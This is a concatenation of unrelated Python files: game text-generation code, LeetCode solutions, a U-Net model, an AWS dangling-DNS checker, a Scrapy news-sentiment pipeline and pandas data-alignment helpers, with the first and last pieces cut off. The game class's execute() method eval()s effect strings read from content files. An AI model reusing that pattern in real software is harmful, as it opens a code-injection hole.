        #         if len(raw_realization) > i+1 and raw_realization[i+1] != ' ' and not part_of_ellipsis:
        #             postprocessed_realization += ' '
        #             # Make sure the next character after the trailing whitespace is capitalized
        #             to_make_uppercase.add(i+2)
        #     elif character in clause_delimiting_punctuation:
        #         # Make sure there's whitespace trailing after this punctuation mark
        #         if len(raw_realization) > i+1 and raw_realization[i+1] != ' ':
        #             postprocessed_realization += ' '
        #             # Make sure the next character after the trailing whitespace is *not* capitalized
        #             to_make_lowercase.add(i+2)
        # return postprocessed_realization
        return raw_realization

    def execute(self):
        """Register the effects of this thought on its thinker."""
        # Update voltages of the signal receptors in the thinker's mind (this makes signals
        # associated with this thought more salient to the thinker merely by virtue of the thinker
        # having thunk this thought)
        self.thinker.mind.update_receptor_voltages_and_synapse_weights(voltage_updates=self.signals)
        # Execute the literal effects associated with this thought
        # SECURITY NOTE: effects are eval()'d strings from content files; same
        # caveat as evaluate_runtime_signal().
        for effect in self.effects:
            effect = eval(effect)
            effect(thinker=self.thinker)()
class ProductionistLite(Productionist):
    """A subclass to Productionist that is meant for lightweight generating of arbitrary text with few constraints."""

    def __init__(self, game):
        """Initialize a ProductionistLite object."""
        # (Docstring previously named the wrong class, 'DialogueGenerator'.)
        super(ProductionistLite, self).__init__(game)

    def target_description_type(self):
        """Attempt to generate a textual description of the given type."""
        # TODO: not yet implemented; currently a no-op placeholder.
        pass
# 198. House Robber
# https://leetcode.com/problems/house-robber/
class Solution:
    """LeetCode 198: maximize loot when adjacent houses cannot both be robbed."""

    def rob(self, nums) -> int:
        """Return the maximum total obtainable without robbing two adjacent houses.

        Classic O(n)-time / O(1)-space dynamic programme: roll forward the
        best totals ending at the previous two positions.
        """
        best_excluding_prev = 0  # best total considering houses up to i-2
        best_so_far = 0          # best total considering houses up to i-1
        for value in nums:
            best_excluding_prev, best_so_far = (
                best_so_far,
                max(best_so_far, best_excluding_prev + value),
            )
        return best_so_far
|
'''alien_0={}
alien_0['color']='green'
alien_0['points']=5
alien_0['x-position']=0
alien_0['y_position']=25
alien_0['speed']='medium'
print(alien_0)
del alien_0['points']
print(alien_0)
alien_0={'color':'red','point':'15'}
alien_1={'color':'blue','point':'10'}
alien_2={'color':'yellow','point':'5'}
aliens=[alien_0,alien_1,alien_2]
print(aliens)
aliens=[]
for alien_number in range(30):
    new_alien={'color':'yellow','point':'5'}
    aliens.append(new_alien)
for alien in aliens[:5]:
    print(alien)
'''
# Map each person to the list of languages they like.
favourite_languages = {
    'mao': ['python', 'rudy'],
    'zhu': ['c'],
    'zhou': ['ruby', 'go'],
    'he': ['python', 'haskell'],
}
# Announce each person's languages, with grammatical agreement on the verb.
for name, languages in favourite_languages.items():
    verb = 'is' if len(languages) == 1 else 'are'
    print("\n" + name.title() + "'s favourite languages " + verb + ":")
    for language in languages:
        print("\t" + language.title())
|
from django.db import models
# Create your models here.
class MaterialInfo(models.Model):
    """Catalogue entry for a material, labelled by material name and maker."""

    # NOTE(review): field names use PascalCase, which is unconventional for
    # Django models (snake_case is the norm); left unchanged because renaming
    # fields requires a schema migration.
    MaterialName = models.CharField(max_length=30, null=False)
    maker = models.CharField(max_length=30)
    category = models.CharField(max_length=20)
    ChemName = models.CharField(max_length=200)
    TechInfo = models.TextField(max_length=1000)
    # TechLink = models.URLField('Site URL')
    # Attach = models.FileField

    def __str__(self):
        """Human-readable label: '<material name> / <maker>'."""
        return self.MaterialName + " / " + self.maker
|
from tensorflow.keras.layers import Input, Conv2D, Conv2DTranspose, BatchNormalization, Activation, Dropout
from tensorflow.keras.applications import DenseNet121
import tensorflow as tf
def unet_model(input_tensor):
    """Build a U-Net segmentation head on top of `input_tensor`.

    The encoder halves spatial resolution four times (strided 2x2 convs in
    place of pooling) while growing channels 32 -> 256; a 512-channel bottom
    follows, then the decoder mirrors the encoder with transposed convolutions
    and skip connections taken from each pre-downsampling activation.

    Returns:
        The final single-channel logits tensor (no activation), e.g.
        (?, 512, 512, 1) for a 512x512 input.

    The layer graph is identical to the original hand-unrolled version; the
    repeated Conv2D -> BatchNorm -> ReLU triplets are factored into helpers.
    """

    def conv_bn_relu(x, filters, name, kernel_size=(3, 3), strides=(1, 1)):
        # One Conv2D -> BatchNormalization -> ReLU stage.
        x = Conv2D(filters=filters, kernel_size=kernel_size, strides=strides,
                   padding="same", name=name)(x)
        return Activation("relu")(BatchNormalization()(x))

    def upconv_bn_relu(x, filters, name):
        # One Conv2DTranspose (2x upsampling) -> BatchNormalization -> ReLU stage.
        x = Conv2DTranspose(filters=filters, kernel_size=(2, 2), strides=(2, 2),
                            padding="same", name=name)(x)
        return Activation("relu")(BatchNormalization()(x))

    # --- Contracting path -------------------------------------------------
    skips = []  # pre-downsampling activations, reused as skip connections
    x = input_tensor
    for block, (filters, dropout_rate) in enumerate(
            [(32, 0.25), (64, 0.5), (128, 0.5), (256, 0.5)], start=1):
        x = conv_bn_relu(x, filters, "conv_{}_1".format(block))
        x = conv_bn_relu(x, filters, "conv_{}_2".format(block))
        skips.append(x)
        # Strided 2x2 conv performs the downsampling.
        x = conv_bn_relu(x, filters, "conv_{}_3".format(block),
                         kernel_size=(2, 2), strides=(2, 2))
        x = Dropout(dropout_rate)(x)
    # (?, 32, 32, 256)

    # --- Bottom -----------------------------------------------------------
    x = conv_bn_relu(x, 512, "conv_5_1")
    x = conv_bn_relu(x, 512, "conv_5_2")
    # (?, 32, 32, 512)

    # --- Expanding path ---------------------------------------------------
    # expansion 1: dropout on the concat AND after the convs (as in original)
    x = upconv_bn_relu(x, 256, "upconv_6_1")
    x = tf.concat(values=[skips[3], x], axis=-1, name='concat_6')
    x = Dropout(0.5)(x)
    x = conv_bn_relu(x, 256, "conv_6_1")
    x = conv_bn_relu(x, 256, "conv_6_2")
    x = Dropout(0.25)(x)
    # (?, 64, 64, 256)

    # expansion 2: no dropout in this block (matches original)
    x = upconv_bn_relu(x, 128, "upconv_7_1")
    x = tf.concat(values=[skips[2], x], axis=-1, name='concat_7')
    x = conv_bn_relu(x, 128, "conv_7_1")
    x = conv_bn_relu(x, 128, "conv_7_2")
    # (?, 128, 128, 128)

    # expansion 3: dropout on the concat only
    x = upconv_bn_relu(x, 64, "upconv_8_1")
    x = tf.concat(values=[skips[1], x], axis=-1, name='concat_8')
    x = Dropout(0.5)(x)
    x = conv_bn_relu(x, 64, "conv_8_1")
    x = conv_bn_relu(x, 64, "conv_8_2")
    # (?, 256, 256, 64)

    # expansion 4: single conv stage (asymmetric with the others, as in original)
    x = upconv_bn_relu(x, 32, "upconv_9_1")
    x = tf.concat(values=[skips[0], x], axis=-1, name='concat_9')
    x = conv_bn_relu(x, 32, "conv_9_1")
    # (?, 512, 512, 32)

    # Final 1x1 projection to one channel; raw logits (no activation).
    return Conv2D(filters=1, kernel_size=(1, 1), activation=None, padding="same",
                  name="conv_10")(x)
def model_on_steroids_densenet121(input_tensor):
    """Build a U-Net-style decoder on top of a (fully trainable) DenseNet121 encoder.

    The DenseNet121 backbone provides the contracting path; the decoder
    upsamples five times with transposed convolutions, concatenating skip
    connections taken from intermediate DenseNet layers at matching
    resolutions. The final upsampling stage has no skip (DenseNet offers no
    full-resolution feature map).

    Returns:
        The final single-channel logits tensor, e.g. (?, 512, 512, 1).

    The layer graph is identical to the original hand-unrolled version; the
    repeated Conv/upconv -> BatchNorm -> ReLU triplets are factored into helpers.
    """

    def conv_bn_relu(x, filters, name):
        # Conv2D 3x3 (he_normal init) -> BatchNormalization -> ReLU.
        x = Conv2D(filters=filters, kernel_size=(3, 3), padding="same",
                   kernel_initializer='he_normal', name=name)(x)
        return Activation("relu")(BatchNormalization()(x))

    def upconv_bn_relu(x, filters, name):
        # Conv2DTranspose 2x2/s2 (he_normal init) -> BatchNormalization -> ReLU.
        x = Conv2DTranspose(filters=filters, kernel_size=(2, 2), strides=(2, 2),
                            padding="same", kernel_initializer='he_normal',
                            name=name)(x)
        return Activation("relu")(BatchNormalization()(x))

    densenet = DenseNet121(include_top=False, input_tensor=input_tensor,
                           input_shape=(512, 512, 3))
    # Fine-tune the entire backbone.
    for layer in densenet.layers:
        layer.trainable = True

    # expansion 1 -> (?, 32, 32, 320), skip from conv4_block24_concat
    x = upconv_bn_relu(densenet.layers[-1].output, 320, "upconv_6_1")
    x = tf.concat(values=[densenet.get_layer("conv4_block24_concat").output, x],
                  axis=-1, name='concat_6')
    x = Dropout(0.5)(x)
    x = conv_bn_relu(x, 320, "conv_6_1")
    x = conv_bn_relu(x, 320, "conv_6_2")
    x = Dropout(0.25)(x)

    # expansion 2 -> (?, 64, 64, 256), skip from conv3_block12_concat (no dropout)
    x = upconv_bn_relu(x, 256, "upconv_7_1")
    x = tf.concat(values=[densenet.get_layer("conv3_block12_concat").output, x],
                  axis=-1, name='concat_7')
    x = conv_bn_relu(x, 256, "conv_7_1")
    x = conv_bn_relu(x, 256, "conv_7_2")

    # expansion 3 -> (?, 128, 128, 128), skip from conv2_block6_concat
    x = upconv_bn_relu(x, 128, "upconv_8_1")
    x = tf.concat(values=[densenet.get_layer("conv2_block6_concat").output, x],
                  axis=-1, name='concat_8')
    x = Dropout(0.5)(x)
    x = conv_bn_relu(x, 128, "conv_8_1")
    x = conv_bn_relu(x, 128, "conv_8_2")

    # expansion 4 -> (?, 256, 256, 96), skip from conv1/relu
    x = upconv_bn_relu(x, 96, "upconv_9_1")
    x = tf.concat(values=[densenet.get_layer("conv1/relu").output, x],
                  axis=-1, name='concat_9')
    x = Dropout(0.5)(x)
    x = conv_bn_relu(x, 96, "conv_9_1")
    x = conv_bn_relu(x, 96, "conv_9_2")

    # expansion 5 -> (?, 512, 512, 64); no skip connection at full resolution
    x = upconv_bn_relu(x, 64, "upconv_10_1")
    x = conv_bn_relu(x, 64, "conv_10_1")

    # Final 1x1 projection to one channel; raw logits. (Default 'valid'
    # padding, as in the original — equivalent to 'same' for a 1x1 kernel.)
    return Conv2D(filters=1, kernel_size=(1, 1), activation=None,
                  name="conv_10")(x)
|
import boto3
from collections import defaultdict
from pprint import pprint
# AWS service clients created from the default session/credentials.
r53 = boto3.client('route53')
ec2 = boto3.client('ec2')
s3 = boto3.client('s3')
# Accumulates DNS records that point at resources which no longer exist,
# keyed by IP address or bucket name.
# NOTE(review): defaultdict() with no factory behaves like a plain dict.
dangling_resources = defaultdict()
# One-time snapshots of all S3 buckets and all Route53 hosted zones.
s3_all_buckets = s3.list_buckets()
r53_zone = r53.list_hosted_zones()
def ec2_info(ipaddress, record_name):
    """Record `ipaddress` as dangling if no EC2 instance currently owns it.

    Looks the address up via DescribeInstances; an empty result means the DNS
    record points at nothing, so it is added to the module-level
    `dangling_resources` map.
    """
    try:
        matches = ec2.describe_instances(Filters=[{
            'Name': 'ip-address',
            'Values': [ipaddress],
        }])
        # Probe the response structure; an empty result raises IndexError.
        matches['Reservations'][0]['Instances'][0]['ImageId']
    except IndexError:
        # No instance claims this address -> the DNS record is dangling.
        dangling_resources[ipaddress] = {
            'record': ipaddress,
            'DNS': record_name,
        }
def s3_info(bucketName, s3dns):
    """Record `bucketName` as dangling if it is not among the account's S3 buckets.

    BUG FIX: the original tested `bucketName not in s3_all_buckets`, i.e.
    membership in the top-level keys of the ListBuckets *response dict*
    ('Buckets', 'Owner', 'ResponseMetadata'), which is effectively always
    true — so every record was flagged as dangling. We now compare against
    the actual bucket names from the response's 'Buckets' list.
    """
    existing_bucket_names = {
        bucket['Name'] for bucket in s3_all_buckets.get('Buckets', [])
    }
    if bucketName not in existing_bucket_names:
        dangling_resources[bucketName] = {
            'record': bucketName,
            'DNS': s3dns,
        }
# Walk every hosted zone and inspect its 'A' records for dangling targets.
for zones in r53_zone['HostedZones']:
    zoneID = zones['Id'].replace('/hostedzone/', '')
    zoneName = zones['Name']
    #Get list of resources for zoneName
    r53_records = r53.list_resource_record_sets(HostedZoneId=zoneID,)
    for records in r53_records['ResourceRecordSets']:
        #Filter out non 'A' records
        if records['Type'] == 'A':
            if records.get('AliasTarget') is not None:
                #Set DNS entry for given record
                s3dns = records['AliasTarget']['DNSName']
                #Records with cloudfront indicating an S3 bucket hosting content
                if 'cloudfront' in s3dns:
                    # NOTE(review): this passes the record's DNS name, not a
                    # bare bucket name — confirm it matches what s3_info expects.
                    bucketname = records['Name']
                    #Call s3_info with bucketname from associated DNS record
                    s3_info(bucketname,s3dns)
            #Filter out infrastructure hosted outside AWS, based on record name
            # '[INTERNAL_RESOURCE_NAME]' is a redacted placeholder; substitute
            # the real internal record prefix before running.
            if records['Name'] != '[INTERNAL_RESOURCE_NAME]' + zoneName:
                try:
                    for elastic_ips in records['ResourceRecords']:
                        #Set EIP
                        ipaddr = elastic_ips['Value']
                        #Set DNS name
                        dns_name = records['Name']
                        #Filter infrastructure hosted outside AWS, based on IP
                        # '[INTERNAL_RESOURCE_IPs]' is likewise a placeholder.
                        if '[INTERNAL_RESOURCE_IPs]' not in ipaddr:
                            #Call ec2_info with EIP and DNS name
                            ec2_info(ipaddr,dns_name)
                except KeyError:
                    # Alias records carry no 'ResourceRecords' key; skip them.
                    continue

# Report every record that was flagged as dangling.
for records in dangling_resources:
    print(dangling_resources[records])
|
class Solution:
    # @param {string} s
    # @param {string[]} words
    # @return {integer[]}
    def findSubstring(self, s, words):
        """Return all start indices in `s` of substrings that are a concatenation
        of every word in `words` exactly once (LeetCode 30).

        Sliding-window approach: all words share one length, so for each of the
        `word_len` alignment offsets we slide a window word-by-word, tracking
        how many needed words it currently contains.
        """
        if not s or not words or not words[0]:
            return []
        # Multiset of the words that must appear in a valid window.
        need = {}
        for w in words:
            need[w] = need.get(w, 0) + 1
        word_len = len(words[0])
        total_words = len(words)
        result = []
        window = {}
        for offset in range(word_len):
            left = offset       # start of the current window
            matched = 0         # number of needed word slots currently filled
            window.clear()
            for j in range(offset, len(s), word_len):
                chunk = s[j:j + word_len]
                if chunk not in need:
                    # A foreign chunk invalidates the window; restart after it.
                    window.clear()
                    matched = 0
                    left = j + word_len
                    continue
                window[chunk] = window.get(chunk, 0) + 1
                if window[chunk] <= need[chunk]:
                    matched += 1
                else:
                    # Too many copies of `chunk`: shrink from the left until
                    # the surplus copy has been evicted.
                    while s[left:left + word_len] != chunk:
                        evicted = s[left:left + word_len]
                        window[evicted] -= 1
                        if window[evicted] == 0:
                            del window[evicted]
                        matched -= 1
                        left += word_len
                    # Drop the leftmost copy of `chunk` itself; its surplus
                    # occurrence was never counted, so `matched` is unchanged.
                    left += word_len
                    window[chunk] -= 1
                if matched == total_words:
                    # Full concatenation starts at `left`; record it and slide
                    # the window forward by one word.
                    result.append(left)
                    leftmost = s[left:left + word_len]
                    window[leftmost] -= 1
                    if window[leftmost] == 0:
                        del window[leftmost]
                    left += word_len
                    matched -= 1
        return result
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
from scrapy.exceptions import DropItem
import pymongo
from nltk.sentiment.vader import SentimentIntensityAnalyzer
from crawlers.misc import lm_positive, lm_negative
class CrawlersPipeline(object):
    """Default no-op pipeline: passes every item through unchanged."""

    def process_item(self, item, spider):
        """Return the item untouched (placeholder hook)."""
        return item
class StatusPipeLine(object):
    """Drops items whose crawl status indicates a failed or malformed fetch."""

    def process_item(self, item, spider):
        """Pass through items with status 1; drop everything else.

        Status 0 means the HTTP fetch failed; any other value means the page
        did not follow the structure the spider knows how to parse.
        """
        status = item.get('status')
        if status == 1:
            return item
        if status == 0:
            raise DropItem("Couldn't fetch item because of response status: %d" % item.get('status'))
        raise DropItem("Couldn't crawl the new with id because it doesn't follow the known structure")
class DuplicatePipeLine(object):
    """Drops items whose id_new already exists in the MongoDB collection."""

    # Collection holding previously stored news items.
    collection_name = "coin_telegraph_news"

    def __init__(self, mongo_uri, mongo_db):
        """Store connection settings; the client itself is opened in open_spider()."""
        self.mongo_uri = mongo_uri
        self.mongo_db = mongo_db

    @classmethod
    def from_crawler(cls,crawler):
        """Build the pipeline from the crawler's MONGO_URI / MONGO_DATABASE settings."""
        return cls(
            mongo_uri = crawler.settings.get("MONGO_URI"),
            mongo_db = crawler.settings.get("MONGO_DATABASE", 'items')
        )

    def open_spider(self,spider):
        """Open the MongoDB connection when the spider starts."""
        #connect to database
        self.client = pymongo.MongoClient(self.mongo_uri)
        self.db = self.client[self.mongo_db]
        self.coin_telegraph_collection = self.db[self.collection_name]

    def close_spider(self, spider):
        """Release the MongoDB connection when the spider finishes."""
        self.client.close()

    def process_item(self,item,spider):
        """Pass the item through only if no stored document shares its id_new."""
        #check if the item was retrieved correctly
        if self.coin_telegraph_collection.count_documents({"id_new" : item.get("id_new")}) == 0:
            return item
        else:
            raise DropItem("Item with id %d already exists" % item.get('id_new'))
class ProcessItemPipeLine(object):
    """Tags each news item with currency flags and a VADER compound sentiment score."""

    def open_spider(self,spider):
        """Build the sentiment analyzer, extended with the Loughran-McDonald lexicon."""
        #initialize sentiment analyzer
        self.analyzer = SentimentIntensityAnalyzer()
        for lexicon in (lm_positive, lm_negative):
            self.analyzer.lexicon.update(lexicon)

    def process_item(self,item,spider):
        """Annotate the item with analysis/currency flags and a sentiment score,
        dropping items unrelated to any supported currency."""
        tags = item.get('tags')
        item['analysis'] = "Price Analysis" in item.get('title')
        # Flag each supported currency when one of its tag markers appears.
        currency_markers = {
            'btc': ("#Bitcoin News", "#Bitcoin"),
            'ltc': ("#Litecoin News", "#Litecoin"),
            'eth': ("#Ethereum News", "#Ethereum"),
            'xrp': ("#Ripple News", "#Ripple"),
        }
        for key, markers in currency_markers.items():
            item[key] = any(marker in tags for marker in markers)
        if not (item['btc'] or item['ltc'] or item['eth'] or item['xrp']):
            raise DropItem("Item with id %d is not related to any currency" % item.get('id_new'))
        #add sentiment
        if item["analysis"] == True:
            pass  # TODO: price-analysis articles need a dedicated scoring path
        else:
            # Average the nonzero per-paragraph compound scores; 0 when none.
            scores = [
                self.analyzer.polarity_scores(paragraph)["compound"]
                for paragraph in item["content"]
            ]
            nonzero = [score for score in scores if score != 0.0]
            if nonzero:
                item["sent_comp"] = sum(nonzero) / len(nonzero)
            else:
                item["sent_comp"] = 0
        return item
class MongoDBPipeLine(object):
    """Persist each processed item into the coin_telegraph_news collection."""

    collection_name = "coin_telegraph_news"

    def __init__(self, mongo_uri, mongo_db):
        self.mongo_uri = mongo_uri
        self.mongo_db = mongo_db

    @classmethod
    def from_crawler(cls, crawler):
        # Read connection settings from the Scrapy project configuration.
        settings = crawler.settings
        return cls(
            mongo_uri=settings.get("MONGO_URI"),
            mongo_db=settings.get("MONGO_DATABASE", 'items'),
        )

    def open_spider(self, spider):
        # Open one client per spider run.
        self.client = pymongo.MongoClient(self.mongo_uri)
        self.db = self.client[self.mongo_db]
        self.coin_telegraph_collection = self.db[self.collection_name]

    def close_spider(self, spider):
        self.client.close()

    def process_item(self, item, spider):
        # Store a plain-dict copy of the item, then pass it down the pipeline.
        self.coin_telegraph_collection.insert_one(dict(item))
        return item
|
import isbnlib
import isbnlib._exceptions as exceptions
import isbnlib.dev._exceptions as goob_exceptions
def getBookData(isbn13):
    """Look up book metadata for an ISBN-13.

    Tries the Google Books ('goob') service first, then falls back to
    isbnlib's default service chain. Returns [name, author, isbn13] on
    success, or False when the ISBN is invalid.

    Fix: a stray `return False` after the fallback lookup discarded the
    fallback result, so this function could never succeed via that path.
    """
    try:
        data = isbnlib.meta(str(isbn13), service='goob')
    except goob_exceptions.NoDataForSelectorError:
        # Google Books had nothing for this ISBN - try the default service.
        try:
            data = isbnlib.meta(str(isbn13))
        except exceptions.NotValidISBNError:
            return False
    authorstring = ', '.join(data['Authors'])
    name = data['Title']
    author = authorstring
    isbn13 = data['ISBN-13']
    return [name, author, isbn13]
|
## MIT License
##
## Copyright (c) 2021 conveen
##
## Permission is hereby granted, free of charge, to any person obtaining a copy
## of this software and associated documentation files (the "Software"), to deal
## in the Software without restriction, including without limitation the rights
## to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
## copies of the Software, and to permit persons to whom the Software is
## furnished to do so, subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included in all
## copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
## OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
## SOFTWARE.
import typing
from hare.core.management.subprocess_command import SubprocessCommand
from hare.conf.settings import BASE_DIR
class Command(SubprocessCommand):
    """Management command that runs pylint with the project's pylintrc."""

    help = "Run Pylint code linter."
    program = "pylint"

    def run_subprocess(
        self,
        command_extra_args: typing.List[str],
        source_paths: typing.List[str],
        **subprocess_kwargs,
    ) -> None:
        """Prepend the rcfile and pylint_django plugin flags, then delegate.

        Fix: subprocess_kwargs were accepted but silently dropped; they are
        now forwarded to the parent implementation.
        """
        # pylintrc lives one directory above BASE_DIR.
        pylintrc_path = f"{BASE_DIR.parent.joinpath('pylintrc')}"
        command_extra_args = [
            "--rcfile",
            pylintrc_path,
            "--load-plugins",
            "pylint_django",
        ] + command_extra_args
        super().run_subprocess(command_extra_args, source_paths, **subprocess_kwargs)
|
#print(f"Hello world {variable}")
def check(story):
    """Scan the text file at path `story` for known rude words.

    Prints one line per rude word found plus a summary, and returns the
    number of distinct rude words present.

    Fixes: the `story` argument was previously ignored (the filename was
    hard-coded), and the file object was read through a misspelled name
    (`my_mystory`), which raised NameError.
    """
    rude_words = ["feo", "chiquito", "hola", "que", "hace"]
    with open(story) as my_story:
        contents = my_story.read()
    rude_count = 0
    for rude in rude_words:
        if rude in contents:
            rude_count += 1
            print(f"found rude word: {rude}")
    if rude_count == 0:
        print("Congratulations, your file has no rude words.")
        print("At least, no rude words I know.")
    else:
        print(f"you have {rude_count} rude words")
    return rude_count
if __name__ == '__main__':
    # Demo run against the sample story file shipped alongside this script.
    check("my_story.txt")
|
import pandas as pd
import numpy as np
def fetch_time(df, key):
    """
    Identity read, used for the time axis itself: return the column values
    unchanged as a NumPy array.
    t1 x1
    t2 x2
    t3 x3
    ->
    t1 x1
    t2 x2
    t3 x3
    """
    column = df[key]
    return column.to_numpy()
def fetch_diff(df, key):
    """
    Interval read for accumulative quantities: the value at t_i becomes
    x_{i+1} - x_i, and the last row is dropped.
    t1 x1
    t2 x2
    t3 x3
    ->
    t1 x2-x1
    t2 x3-x2
    """
    stepped = df[key].diff(1)
    aligned = stepped.shift(-1).dropna()
    return aligned.to_numpy()
def fetch_roll(df, key):
    """
    Interval read using the midpoint of consecutive samples as the
    approximation for each interval: the value at t_i becomes
    (x_i + x_{i+1}) / 2, and the last row is dropped.
    t1 x1
    t2 x2
    t3 x3
    ->
    t1 (x1+x2)/2
    t2 (x2+x3)/2
    """
    pair_means = df[key].rolling(2).mean()
    return pair_means.shift(-1).dropna().to_numpy()
def fetch_skip(df, key):
    """
    Sparse "step" read: keep every other row (positions 0, 2, 4, ...),
    collapsing step-encoded duplicates.
    t1 x1
    t2 x1
    t2 x2
    t3 x2
    ->
    t1 x1
    t2 x2
    """
    every_other = df[key].iloc[::2]
    return every_other.to_numpy()
def fluctuation_smooth(seq: np.ndarray):
    """In-place smoothing of spurious zero drops in a model output series.

    The model sometimes emits a [high, 0] pair due to numerical problems
    when water is "enough"; each zero and its predecessor are replaced by
    their average so downstream decision logic sees a de-fluctuated value:
        0.2, 0.3, 0.8, 0.0, 1.2, 0.0, ...
        ->
        0.2, 0.3, 0.4, 0.4, 0.6, 0.6, ...
    A zero in the very first position is left untouched (no predecessor).
    NOTE: consecutive zeros are averaged pairwise against their immediate
    predecessor, which may itself be a zero - confirm acceptable for callers.

    Fix: previously the early no-zero path returned None while the normal
    path returned seq; seq is now returned consistently.
    """
    zero_idx = np.where(seq == 0)[0]
    if len(zero_idx) == 0:
        return seq
    if zero_idx[0] == 0:
        zero_idx = zero_idx[1:]
    prev_idx = zero_idx - 1
    smoothed = (seq[zero_idx] + seq[prev_idx]) / 2
    seq[zero_idx] = seq[prev_idx] = smoothed
    return seq
def get_aligned_dict(data_map, df_node_map_map, df_map_map, out_map=None, *, wq_keys=None, aser_keys=None,
                     smooth_wqpsc_inp=True, drop_WQWCTS_OUT_obsession_edge_int=True):
    """
    Build a dict of 1-D arrays, all aligned to the aser.inp time axis.

    out_map is the output of run and optional; when given, outflow,
    elevation and per-cell water-quality series from the run output are
    included as well.

    Parameters:
        data_map: input files; data_map["aser.inp"] supplies the "time"
            column and the aser_keys columns.
        df_node_map_map: accepted for interface symmetry; not used here.
        df_map_map: per-file dict of per-node DataFrames; "wqpsc.inp" and
            "qser.inp" entries are read.
        out_map: run outputs ("qbal.out", "WQWCTS.OUT"); optional.
        wq_keys: water-quality columns to extract (defaults to ["ROP"]).
        aser_keys: aser.inp columns to extract (defaults to ["rain"]).
        smooth_wqpsc_inp: de-fluctuate the wqpsc series in place.
        drop_WQWCTS_OUT_obsession_edge_int: trim duplicated edge timestamps
            from each (I, J, K) group of WQWCTS.OUT.
    """
    if wq_keys is None:
        wq_keys = ["ROP"]
    if aser_keys is None:
        aser_keys = ["rain"]
    aligned_dict = {}
    # aligned_dict["time"] = fetch_time(out_map["qbal.out"], "jday")
    aligned_dict["time"] = fetch_time(data_map["aser.inp"], "time")
    if out_map is not None:
        # Outflow is cumulative: difference it, flip the sign, and rescale.
        aligned_dict["flow_qctlo"] = - fetch_diff(out_map["qbal.out"], "qctlo(million-m3)") * 1_000_000 # million-m3 -> m3
        aligned_dict["elev"] = fetch_roll(out_map["qbal.out"], "elev(m)")
        # One sub-frame per model cell (I, J, K).
        gb = out_map["WQWCTS.OUT"].groupby(["I", "J", "K"])
        wq_ij_map = dict(tuple(gb))
        if drop_WQWCTS_OUT_obsession_edge_int:
            wq_ij_map = {key: drop_obsession_edge_int(value, "TIME") for key, value in wq_ij_map.items()}
        for wq_key in wq_keys:
            for ij_tuple in wq_ij_map:
                key = f"{wq_key}_{ij_tuple}"
                aligned_dict[key] = fetch_roll(wq_ij_map[ij_tuple], wq_key)
    for wq_key in wq_keys:
        for flow_key, df in df_map_map["wqpsc.inp"].items():
            key = f"{wq_key}_{flow_key}"
            seq = fetch_skip(df, wq_key)
            if smooth_wqpsc_inp:
                # Mutates seq in place (see fluctuation_smooth).
                fluctuation_smooth(seq)
            aligned_dict[key] = seq
    for key, df in df_map_map["qser.inp"].items():
        key = f"flow_{key}"
        aligned_dict[key] = fetch_skip(df, "flow") * 3600 # m3/s -> m3/h
    for aser_key in aser_keys:
        aligned_dict[aser_key] = fetch_roll(data_map["aser.inp"], aser_key)
    return aligned_dict
def get_aligned_df(data_map, df_node_map_map, df_map_map, out_map=None, **kwargs):
    """
    Build the aligned dict and truncate every series to the shortest one,
    returning the result as a DataFrame.

    This function itself may modify the data supplied in, so it is not a
    pure "view".
    """
    aligned = get_aligned_dict(data_map, df_node_map_map, df_map_map, out_map, **kwargs)
    shortest = min(len(series) for series in aligned.values())
    trimmed = {name: series[:shortest] for name, series in aligned.items()}
    return pd.DataFrame(trimmed)
def stats_load(df, df_ori, wq_key, flow_key_list, qctlo_key="qctlo", pump_key="pump_outflow"):
    """
    Compute per-source pollutant loads (concentration x flow) plus totals.

    df_ori should hold the un-modified qser flows; each flow source's load
    is based on its flow *reduction* relative to df.
    """
    loads = {}
    loads[f"load_{qctlo_key}"] = df[f"{wq_key}_{qctlo_key}"] * df[f"flow_{qctlo_key}"]
    for source in flow_key_list:
        reduction = df_ori[f"flow_{source}"] - df[f"flow_{source}"]
        loads[f"load_{source}"] = df[f"{wq_key}_{source}"] * reduction
    loads[f"load_{pump_key}"] = df[f"flow_{pump_key}"] * df[f"{wq_key}_{pump_key}"]
    result = pd.DataFrame(loads)
    flow_columns = [f"load_{source}" for source in flow_key_list]
    result["load_flow"] = result[flow_columns].sum(axis=1)
    result["load_total"] = result[f"load_{qctlo_key}"] + result["load_flow"] + result[f"load_{pump_key}"]
    return result
def append_out_map_direct(out_map1, out_map2):
    """Concatenate the two out_maps file-by-file, re-indexing each result.

    Fix: uses pd.concat because DataFrame.append was deprecated in pandas
    1.4 and removed in pandas 2.0.
    """
    rd = {}
    for key in out_map1:
        df: pd.DataFrame = pd.concat([out_map1[key], out_map2[key]])
        rd[key] = df.reset_index(drop=True)
    return rd
# Half an hour expressed in days (1/48): two timestamps closer than this are
# treated as duplicated "edge" points in the simulator output.
obsession_detect_threshold = 1 / 24 / 2
def drop_obsession_edge_int(df: pd.DataFrame, time_key, cut_head=False, cut_tail=False):
    """
    Strip duplicated "edge" rows whose timestamp is closer than
    obsession_detect_threshold to its neighbour, at both ends of df.

    0.0, 0.00024, 0.04187, ..., 0.95850, 1.00024, ..., 1.95850, 1.99976, 2.00000
    ->
    0.00024, 0.04187, ..., 0.95850, 1.00024, ..., 1.95850, 1.99976

    cut_head / cut_tail additionally drop one extra row after trimming.
    NOTE(review): assumes df has at least two rows - iloc[1] / iloc[-2]
    would raise on shorter frames; confirm with callers.
    """
    # Trim near-duplicate rows at the head.
    while abs(df[time_key].iloc[1] - df[time_key].iloc[0]) < obsession_detect_threshold:
        df = df.iloc[1:]
    if cut_head:
        df = df.iloc[1:]
    # Trim near-duplicate rows at the tail.
    while abs(df[time_key].iloc[-1] - df[time_key].iloc[-2]) < obsession_detect_threshold:
        df = df.iloc[:-1]
